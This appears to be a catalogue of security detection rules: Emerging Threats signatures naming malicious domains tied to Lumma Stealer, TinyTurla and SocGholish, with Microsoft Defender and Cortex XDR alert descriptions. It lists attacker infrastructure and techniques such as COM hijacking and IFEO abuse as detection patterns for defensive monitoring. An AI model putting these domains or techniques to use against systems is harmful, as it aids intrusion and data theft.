ET MALWARE Observed Lumma Stealer Related Domain (antiuncontemporary .fun in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (associationokeo .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (baketransparentadw .pics in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (baresoakopiniocowe .fun in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (bicyclesunhygenico .fun in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (birdvigorousedetertyw .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (bleednumberrottern .home in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (brakesummitfiightre .pics in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (cattilecodereowop .pw in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (chocolatedepressofw .fun in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (colonmoonmushroo .mom in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (decorousnumerousieo .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (despairphtsograpgp .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (detectordiscusser .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (developmentalveiop .home in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (exitassumebangpastcone .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (fantasticabnormally .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (feturepoudbicchteo .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (fikkeropendorwiw .pw in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (fishboatnurrybeauti .fun in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (flexibleagttypoceo .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (fossillandscapefewkew .site in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (greenbowelsustainny .fun in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (healthproline .pro in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (hunterstrawmersp .home in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (ironshottallinko .funu in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (knonkcdalfyhitt .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (landgateindirectdangre .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (lawwormroleveinn .mom in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (lawwormroleveinn .momu in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (legislationdictater .mom in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (mazumaponyanthus .fun in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (mercyaloofprincipleo .pics in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (muggierdragstemmio .fun in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (numberlesswortheiwol .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (pavementpreferencewjiao .site in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (pielumchalotpostwo .fun in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (pooreveningfuseor .pw in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (pooreveningfuseor .pwl in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (problemregardybuiwo .fun in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (punchtelephoneverdi .store in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (reechoingkaolizationp .fun in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (samplepoisonbarryntj .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (scshemevalleywelferw .site in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (smallrabbitcrossing .site in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (snuggleapplicationswo .fun in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (strainriskpropos .store in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (superiorhardwaerw .pw in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (telephoneverdictyow .site in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (telldruggcommitetter .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (theoryapparatusjuko .fun in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (theoryapparatusjuko .funl in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (theoryapparatusjuko .funr in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (theoryapparatusjuko .funy in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (thinrecordsunrjisow .pw in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (townsfolkhiwoeko .fun in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (turkeyunlikelyofw .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (unexaminablespectrall .fun in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (vatleaflettrusteeooj .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (villagemagneticcsa .fun in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lumma Stealer Related Domain (woodfeetumhblefepoj .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed MacOS RustDoor Related Domain (serviceicloud .com in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (akites .site in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (civilizations .store in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (cloudown .store in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (countrysvc .pe .kr in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (ewbjr2h375tjz5fh3wvohsetk .com in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (kakaoaccouts .store in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (kakaoteam .site in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (mofamail .homes in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (mofamail .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (navecorps .com in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (naveralarm .com in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (naveralert .com in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (navercafe .info in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (naverscorp .shop in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (navigation .cc in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (ned .newnotification .server .korea in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (nidnaver .help in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (nidnaver .info in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (nmail .navermail .online .korea in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (nsvc .mail .server .korea in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (pdfmicrosoft .ddns .net in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (taxservice .pe .kr in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (upbit-service .pe .kr in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malicious Domain (upbit2024 .re .kr in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malvertising Domain (parsic .org) in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malvertising Domain (reclaimmycredit .com) in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malvertising Related Domain (darknetlinks .wiki) in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malvertising Related Domain (healthbeautycosmetics .com) in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malvertising Related Domain (hmgcyberschools .com) in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malvertising Related Domain (legit .onelink .me) in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Malware Delivery Domain (a0917004 .xsph .ru in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed TinyTurla Domain (buy-new-car .com in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed TinyTurla Domain (caduff-sa .ch in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed TinyTurla Domain (carleasingguru .com in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed TinyTurla Domain (hanagram .jp in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed TinyTurla Domain (jeepcarlease .com in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed TinyTurla Domain (thefinetreats .com in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Possible PikaBot Java Loader CnC Checkin This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE PyRation Variant - Configuration Request This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE PyRation Variant - Configuration Response This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE RubySleet APT TrollAgent CnC Checkin This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE SocGholish CnC Domain in TLS SNI (* .collection .aixpirts .com) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE SocGholish CnC Domain in TLS SNI (* .day .50adayplan .com) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE SocGholish CnC Domain in TLS SNI (* .members .openarmscv .com) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE SocGholish CnC Domain in TLS SNI (* .our .openarmscv .org) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE SocGholish Domain in TLS SNI (stake .libertariancounterpoint .com) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Suspected TA430/Andariel AndarLoader Related Domain in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Suspected TA451 Related FalseFont Backdoor Activity M4 This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Suspected TA451 Related FalseFont Backdoor Activity M5 This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Synapse/Lambda Ransomware CnC Checkin This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE TinyTurlaNG Turla APT GetTask Request This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE TinyTurlaNG Turla APT Initial Client Beacon This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Win/Ghostlocker Ransomware Activity M1 (POST) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Win/Ghostlocker Ransomware Activity M2 (POST) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Win32/AsyncRAT CnC Checkin (GET) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Win32/MarioLoader CnC Activity (POST) M1 This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Win32/MarioLoader CnC Activity (POST) M2 This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Win32/MarioLoader Payload Request (GET) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
Microsoft Defender For Cloud - Login from an unusual data center Unusual login is an anomaly that occurs in the access pattern to your resource.
Usually, data resources are accessed from similar locations.
This can be from an application that is accessing the data to provide business logic, or from a user that is performing administrative tasks.
For production workloads, access pattern stabilizes over time to a concrete list of locations. If a login to your resource occurs from an unusual data center, this indicates an anomaly that should be investigated.
At times, it can come from a familiar origin that moved to a different location due to IP change/lease, travel, or use of different cloud providers, VPNs, etc.
Often, access from data center is used by IPs that belong to cloud providers, but are leased to customers, and therefore do not represent access from the cloud provider company.
Please inspect the login event, identify the application/user (based on application name and IP/Location) and try to find out whether it is familiar to you, or suspicious.
If it is unrecognized, use firewall rules to limit the access to your resource, and make sure you use strong passwords and not well known user names.
Also, consider using only AAD authentication to further enhance your security posture.
Finally, review the Audit logs (if turned on) to understand the activity that was made, and consider taking additional actions to protect the data.
Microsoft Defender For Cloud - Malicious blob was downloaded from a storage account (Preview) A malicious blob was downloaded from the blob container ‘dms-documents’ in the storage account ‘tmstukslmppro001’.
We recommend taking immediate actions:
1. Isolate or delete the malicious blob to stop further malware distribution.
2. If you have automated responses for malware uploads, this security alert suggests they may not be effective or work well. Revisit your automation settings.
It is possible that this malware was downloaded more than once and from more than one source. To get detailed information on who read the blob (if AAD authentication was used), how, and when, refer to the “Supporting evidence events” section in the Azure Portal. The “General Information” and “Entities” sections provide information on the downloaded blob and the detected malware.
Microsoft Defender For Cloud - Security incident detected suspicious virtual machines This incident indicates suspicious activity on your virtual machines. Multiple alerts from different Defender for Cloud plans have been triggered revealing a similar pattern on your virtual machines. This might indicate a threat actor has gained unauthorized access to your environment and is attempting to compromise it.
Microsoft Defender For Cloud - Suspicious installation of a GPU extension was detected on your virtual machine (Preview) Suspicious installation of a GPU extension was detected on your virtual machine by analyzing the Azure Resource Manager operations in your subscription.
Attackers may use the GPU driver extension to install GPU drivers on your virtual machine via the Azure Resource Manager to perform cryptojacking.
This activity is deemed suspicious as the principal’s behavior departs from its usual patterns.
Palo Alto Networks Cortex XDR - A service account successfully logged in from a new country or ASN A service account successfully logged in from a new country or ASN
Palo Alto Networks Cortex XDR - A user enabled the Windows default Guest account A user enabled the Windows default Guest account
Palo Alto Networks Cortex XDR - A user uploaded over 500 MB to a rare storage or mail domain A user uploaded over 500 MB to a rare storage or mail domain
Palo Alto Networks Cortex XDR - Alcatel OmniPCX Office MasterCGI Remote Command Execution Vulnerability Alcatel OmniPCX Office MasterCGI Remote Command Execution Vulnerability
Palo Alto Networks Cortex XDR - AndroidOS Baiduprotect PUA Traffic Detection AndroidOS Baiduprotect PUA Traffic Detection
Palo Alto Networks Cortex XDR - Bad Malware, wipe if ran Bad Malware, wipe if ran
Palo Alto Networks Cortex XDR - Bind9 DNS Server Denial-of-Service Vulnerability Bind9 DNS Server Denial-of-Service Vulnerability
Palo Alto Networks Cortex XDR - Cobalt Strike DNS Redirector Traffic Detection Cobalt Strike DNS Redirector Traffic Detection
Palo Alto Networks Cortex XDR - COM Object Hijacking COM Object Hijacking - 4007318107
Palo Alto Networks Cortex XDR - Cortex Payload Hijack Cortex Payload Hijack - 3421945413
Palo Alto Networks Cortex XDR - D-Link D-View TftpSendFileThread Directory Traversal Vulnerability D-Link D-View TftpSendFileThread Directory Traversal Vulnerability
Palo Alto Networks Cortex XDR - Detect Active Directory Management DLL on Non-ADMV Detect Active Directory Management DLL on Non-ADMV
Palo Alto Networks Cortex XDR - DNS Security Domain Exception DNS Security Domain Exception
Palo Alto Networks Cortex XDR - Fragroute Evasion Attack For Unknown-TCP Traffic Fragroute Evasion Attack For Unknown-TCP Traffic
Palo Alto Networks Cortex XDR - Globally uncommon suspicious injection from a signed process Globally uncommon suspicious injection from a signed process
Palo Alto Networks Cortex XDR - High-frequency NTLM brute force attempts detected High-frequency NTLM brute force attempts detected
Palo Alto Networks Cortex XDR - HTTP Cross-Site Scripting Vulnerability HTTP Cross-Site Scripting Vulnerability
Palo Alto Networks Cortex XDR - Image file execution options (IFEO) registry key set to execute a shell or scripting engine process Image file execution options (IFEO) registry key set to execute a shell or scripting engine process
Palo Alto Networks Cortex XDR - Imagemagick Arbitrary File Read Vulnerability Imagemagick Arbitrary File Read Vulnerability
Palo Alto Networks Cortex XDR - LOLBIN spawned by an Office executable connected to a rare external host LOLBIN spawned by an Office executable connected to a rare external host
Palo Alto Networks Cortex XDR - Manipulation of the MonitorProcess Registry key Manipulation of the MonitorProcess Registry key
Palo Alto Networks Cortex XDR - Microsoft IIS 5.0 Form_JScript.asp XSS Vulnerability Microsoft IIS 5.0 Form_JScript.asp XSS Vulnerability
Palo Alto Networks Cortex XDR - Microsoft IIS ServerVariables_JScript. asp Information Disclosure Microsoft IIS ServerVariables_JScript. asp Information Disclosure
Palo Alto Networks Cortex XDR - Microsoft IIS Translate F Header Source Disclosure Vulnerability Microsoft IIS Translate F Header Source Disclosure Vulnerability
Palo Alto Networks Cortex XDR - Microsoft PE File Microsoft PE File
Palo Alto Networks Cortex XDR - Microsoft Windows GDI Information Disclosure Vulnerability Microsoft Windows GDI Information Disclosure Vulnerability
Palo Alto Networks Cortex XDR - Microsoft Windows Remote Code Execution Vulnerability Microsoft Windows Remote Code Execution Vulnerability
Palo Alto Networks Cortex XDR - Multiple Vendors Parameters Hash Collision Denial-Of-Service Vulnerability Multiple Vendors Parameters Hash Collision Denial-Of-Service Vulnerability
Palo Alto Networks Cortex XDR - new:amplreq.com new:amplreq.com
Palo Alto Networks Cortex XDR - OpenVAS Vulnerability Scanner Detection OpenVAS Vulnerability Scanner Detection
Palo Alto Networks Cortex XDR - Oracle Web Cache HTTP Request Parsing Heap Overflow Vulnerability Oracle Web Cache HTTP Request Parsing Heap Overflow Vulnerability
Palo Alto Networks Cortex XDR - Oracle WebLogic Server Side Request Forgery Vulnerability Oracle WebLogic Server Side Request Forgery Vulnerability
Palo Alto Networks Cortex XDR - PCCS Mysql Database Admin Tool Username and Password Disclosure Vulnerability PCCS Mysql Database Admin Tool Username and Password Disclosure Vulnerability
Palo Alto Networks Cortex XDR - PHP-Fusion Downloads.php Command Injection Vulnerability PHP-Fusion Downloads.php Command Injection Vulnerability
Palo Alto Networks Cortex XDR - Possible Host Scan detected Possible Host Scan detected
Palo Alto Networks Cortex XDR - Rapid7 Alert on Malicious hash Rapid7 Alert on Malicious hash
